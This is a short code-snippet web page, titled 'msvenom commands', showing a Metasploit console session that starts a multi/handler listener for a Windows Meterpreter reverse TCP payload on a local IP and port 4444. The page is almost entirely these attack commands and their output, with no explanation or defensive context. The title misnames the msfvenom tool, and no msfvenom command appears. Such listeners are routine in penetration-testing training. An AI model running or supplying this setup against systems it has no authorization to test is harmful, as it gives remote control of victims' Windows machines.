Search
 
SCRIPT & CODE EXAMPLE
 
CODE EXAMPLE FOR SHELL

msvenom commands

nli@nlistation:~$ sudo msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.123
lhost => 192.168.1.123
msf exploit(multi/handler) > set lport 4444
lport => 4444
msf exploit(multi/handler) > run
Source by nitesculucian.github.io #
 
PREVIOUS NEXT
Tagged: #msvenom #commands
ADD COMMENT
Topic
Name
7+6 =